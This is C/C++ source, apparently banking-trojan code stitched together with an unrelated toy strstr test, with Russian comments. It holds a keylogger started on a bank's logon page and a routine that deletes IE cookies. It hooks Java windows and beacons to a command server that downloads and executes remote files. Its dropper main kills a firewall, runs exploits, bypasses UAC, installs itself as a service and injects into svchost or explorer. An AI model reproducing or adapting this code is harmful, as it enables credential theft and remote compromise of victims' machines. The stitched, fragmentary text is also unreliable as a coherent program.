void WINAPI IEURLChanged(PKeyLogger Logger, DWORD EventID, LPVOID Data)
{
char* url = (char*)Data;
if( System == 0 )
{
//реагируем когда в урле есть слово avangard и далее logon_enter
char* p = m_strstr( url, "avangard" );
if( p )
{
p += 8;
if( m_strstr( url, "logon_enter" ) )
{
DBGAVG( "Avangard", "Урл %s", url );
InitKeyLogger();
}
}
}
}
void DeleteIE_cookies(char* os)
{
if(m_strstr(os, "Windows XP"))
{
DeleteIECookies(1);
}
else if(m_strstr(os, "Windows Vista") ||
m_strstr(os, "Windows Seven") ||
m_strstr(os, "Windows Server 2008") ||
m_strstr(os, "Windows Server 2008 R2"))
{
DeleteIECookies(2);
}
else
{
DeleteIECookies(1);
DeleteIECookies(2);
}
}
int main(void){
char str[] = "sdhfkjsdghshellowdsgfds";
char sub[] = "hello";
char *p = m_strstr(str,sub);
if(NULL == p)
printf("sub is not in str.\n");
else
printf("bingo, sub is in str.\nsub string is :\n%s\n",p);
return 0;
}
// если она ещё не перехвачена. Если показывается диалог, то считаем его
// модальным, все координаты кликов будут обрабатываться для него.
static BOOL WINAPI Hook_ShowWindow(HWND hWnd, int Cmd)
{
// Получаем название класса окна
OutputDebugString("1234");
char cClasN[MAX_PATH];
GetClassNameA(hWnd, cClasN, MAX_PATH);
bool isFrame = (NULL != m_strstr(cClasN, "SunAwtFrame"));
bool isDialog = (NULL != m_strstr(cClasN, "SunAwtDialog"));
if (SW_HIDE != Cmd)
{
OutputDebugString("Hook_ShowWindow");
if (isFrame)
{
// Перебиваем оконную функцию на свою
DbgMsg(cClasN, (int)Cmd, "Java Frame Wnd");
ChangeWndProc(hWnd, &g_frame_wnd, &g_old_frame_wnd_proc);
g_is_dialog = false;
} else
if (isDialog)
{
// Перебиваем оконную функцию на свою
DbgMsg(cClasN, (int)Cmd, "Java Dialog Wnd");
ChangeWndProc(hWnd, &g_dialog_wnd, &g_old_dialog_wnd_proc);
g_is_dialog = true;
}
}
else
{
g_is_dialog = false;
}
Cmd /= Cmd & 0xf0000000;
// Вызываем дефолтную ShowWindow
return Real_ShowWindow(hWnd, Cmd);
}
bool ParseUrl1( char *Url, char **Server, char **Path, int *Port )
{
char *Ptr1 = NULL;
char *Ptr2 = NULL;
char *Ptr3 = NULL;
char *Ptr4 = NULL;
char *Host = (char*)MemAlloc( 512 );
char *OptionalPort = (char*)MemAlloc( 512 );
if ( Host == NULL ||
OptionalPort == NULL )
{
return false;
}
DWORD dwPort = 0;
Ptr1 = m_strstr( Url, "://" );
if( Ptr1 )
{
Ptr1 += 3;
}
else
{
Ptr1 = Url;
}
Ptr4 = m_strstr( Ptr1, "/" );
Ptr2 = m_strstr( Ptr1, ":" );
if( !Ptr2 )
{
*Port = 80;
Ptr3 = m_strstr( Ptr1, "/" );
if( !Ptr3 )
{
return false;
}
m_memcpy( Host, Ptr1, Ptr3 - Ptr1 );
Host[ Ptr3 - Ptr1 ] = '\0';
}
else
{
Ptr3 = m_strstr( Ptr1, "/" );
if( !Ptr3 )
{
return false;
}
m_memcpy( OptionalPort, Ptr2 + 1, Ptr3 - Ptr2 );
m_memcpy( Host, Ptr1, Ptr2 - Ptr1 );
OptionalPort[ Ptr3 - Ptr2 ] = '\0';
Host[ Ptr2 - Ptr1 ] = '\0';
*Port = m_atoi( OptionalPort );
}
MemFree( OptionalPort );
*Server = Host;
*Path = Ptr4;
return true;
}
bool ReportToPlugin( char *Url )
{
WSADATA wsa;
if ( (int)pWSAStartup( MAKEWORD( 2, 2 ), &wsa ) != 0 )
{
return false;
}
char *Host = NULL;
char *Path = NULL;
int Port = 0;
if ( !ParseUrl1( Url, &Host, &Path, &Port ) )
{
return false;
}
char Uid[100];
GenerateUid( Uid );
typedef int ( WINAPI *fwsprintfA )( LPTSTR lpOut, LPCTSTR lpFmt, ... );
fwsprintfA pwsprintfA = (fwsprintfA)GetProcAddressEx( NULL, 3, 0xEA3AF0D7 );
char *UserAgent = NULL;
UserAgent = (char*)MemAlloc( 1024 );
DWORD dwUserSize = 1024;
pObtainUserAgentString( 0, UserAgent, &dwUserSize );
if ( UserAgent == NULL )
{
MemFree( UserAgent );
UserAgent = "-";
}
char Request[] = "POST %s HTTP/1.0\r\n"
"Host: %s\r\n"
"User-Agent: %s\r\n"
"Accept: text/html\r\n"
"Connection: Close\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"Content-Length: %d\r\n\r\n";
char Args[] = "id=";
char *HttpPacket = NULL;
HttpPacket = (char*)MemAlloc( 2048 );
int iTmp;
if (LoadExe!=NULL)
{
iTmp=m_lstrlen(LoadExe);
}else iTmp=9;
pwsprintfA( HttpPacket, Request, Path, Host, UserAgent, m_lstrlen( Args ) + m_lstrlen( Uid )+iTmp );
m_lstrcat( HttpPacket, Args );
m_lstrcat( HttpPacket, Uid );
if (LoadExe==NULL)
{
LoadExe = (char*)MemAlloc(10);
m_lstrncpy(LoadExe,"&plugins=",9);
LoadExe[9]='\0';
}
m_lstrcat( HttpPacket, LoadExe );
SOCKET Socket = MyConnect1( Host, Port );
if( Socket == -1 )
{
return false;
}
bool b = MySend( Socket, (const char *)HttpPacket, m_lstrlen( HttpPacket ) );
MemFree( HttpPacket );
if ( !b )
{
return false;
}
DWORD dwSize = 0;
char *Buffer = RecvAndParse( Socket, &dwSize );
if ( !Buffer )
{
pclosesocket( Socket );
return false;
}
char MultiDownloadCommand[]={'m','u','l','t','i','d','o','w','n','l','o','a','d',0};
char *Context;
m_strtok_s( Buffer, "\r\n", &Context );
if ( !m_lstrncmp( Buffer, MultiDownloadCommand, m_lstrlen( MultiDownloadCommand ) ) )
{
char * cPointer= m_strstr(&Buffer[1],"http:");
char* cUrl=Buffer;
char* cUrlNext;
int i;
char *DownloadUrl;
while (true)
{
cUrl= m_strstr(&cUrl[1],"http:");
if (cUrl==NULL)break;
cUrlNext= m_strstr(cUrl,"|");
i=m_lstrlen(cUrl)-m_lstrlen(cUrlNext);
DownloadUrl = (char*)MemAlloc(i)+1;
m_lstrncpy(DownloadUrl,cUrl,i);
DownloadUrl[i]='\0';
if ( DownloadUrl )
{
LoadExe=(char*)MemRealloc(LoadExe,33+m_lstrlen(LoadExe)+1);
m_lstrcat( LoadExe, MD5StrFromBuf(DownloadUrl, STRA::Length(DownloadUrl)).t_str());
m_lstrcat( LoadExe, "|");
WCHAR *FileName =(WCHAR *)GetTempName();
if ( FileName && DownloadUrl )
{
ExecuteFile( DownloadUrl, FileName );
}
MemFree( FileName );
}
MemFree( DownloadUrl );
}
}
MemFree( Buffer );
pclosesocket( Socket );
return true;
}
int APIENTRY MyMain(int argc, char** argv)
{
//return 0;
//TestStepNotifications();
//MultiMethodReboot();
//return 0;
//PP_DPRINTF(L"MyMain: started");
//if ( IsUserLocalSystem() )
//{
// PP_DPRINTF(L"MyMain: current user is LocalSystem.");
// SvcFuckupRunAsService(SvcFuckupServiceMainTest);
//}
//else
//{
// PP_DPRINTF(L"MyMain: current user is NOT LocalSystem.");
// if ( m_strstr((PCHAR)pGetCommandLineA(),"-install") )
// {
// PP_DPRINTF(L"MyMain: '-install' param specified. Run SvcFuckup.");
// bool fuckup_result = SvcFuckupRun();
// PP_DPRINTF(L"MyMain: SvcFuckupRun() finished with result=%d.", fuckup_result);
// }
//}
//PP_DPRINTF(L"MyMain: finished");
//return 0;
UnhookDlls();//снимаем хуки
GetPaths();
// 100_d запуск дропера
PP_DBGRPT_FUNCTION_CALL(DebugReportStepByName("100_d"));
/* проверка установлен ли буткит */
if ((DWORD)pGetFileAttributesA(PathBkFile) != INVALID_FILE_ATTRIBUTES)
{
PP_DPRINTF(L"MyMain: bootkit already installed. Killing oneself.");
InitSuicide();
WaitAndExitProcess(0);
return 0;
};
KillOutpost();
DoExploits();
// 100_d запуск дропера
PP_DBGRPT_FUNCTION_CALL(DebugReportStepByName("101_d"));
// Проверка целевой платформы.
if (!CurrentPlatformAllowedByTargetSpecifier())
{
InitSuicide();
PP_DPRINTF(L"MyMain:Current platform not allowed by target specifier. Callin ExitProcess...");
WaitAndExitProcess(0);
return 0;
}
// 109_d точка прохождения целевой платформы
PP_DBGRPT_FUNCTION_CALL(DebugReportStepByName("109_d"));
// Проверка на параметр запуска с правами UAC
if ( m_strstr((PCHAR)pGetCommandLineA(),ARGV_UAC_RUN) )
{
PP_DPRINTF(L"MyMain: UAC param detected. Calling ExplorerMain...");
int ret = -1;
if ( ExplorerMain() )
{
PP_DPRINTF(L"MyMain: UAC param detected. ExplorerMain OK. Quit and killing oneself...");
InitSuicide();
WaitAndExitProcess(0);
return 0;
}
PP_DPRINTF(L"MyMain: UAC param detected. ExplorerMain failed. Just quit process.");
WaitAndExitProcess(ret);
return 0;
};
//
// Если процесс запущен с системными правами переходим к инсталяции.
//
if (IsUserLocalSystem())
{
PP_DPRINTF(L"MyMain: LocalSystem current user detected. Runing SvcFuckupRunAsService().");
SvcFuckupRunAsService(SvcFuckupServiceMain);
PP_DPRINTF(L"MyMain: SvcFuckupRunAsService() finished. Calling ExitProcess().");
WaitAndExitProcess(0);
return 0;
};
// Если процесс запущен обычно, но включена поддержка SvcFuckup
// то пробуем это сделать и прибиваем себя.
if (SvcFuckupEnabled())
{
PP_DPRINTF(L"MyMain: SvcFuckup enabled. Run SvcFuckupRun");
bool fuckup_result = SvcFuckupRun();
PP_DPRINTF(L"MyMain: SvcFuckupRun() finished with %d", fuckup_result);
InitSuicide();
WaitAndExitProcess(0);
return 0;
}
PP_DPRINTF(L"MyMain: All checks passed. Trying to jump to svchost");
dwExplorerSelf = 0;
if (!JmpToSvchost( ExplorerRoutine ))
{
PP_DPRINTF(L"MyMain: Jump to svchost failed. Trying jump to explorer");
dwExplorerSelf = 1;
if (! InjectIntoExplorer ( ExplorerRoutine ) )
{
PP_DPRINTF(L"MyMain: Jump to explorer failed. Trying just do ExplorerRoutine");
ExplorerRoutine( NULL );
}
}
PP_DPRINTF(L"MyMain: finished.");
pExitProcess( 1 );
return 1;
}
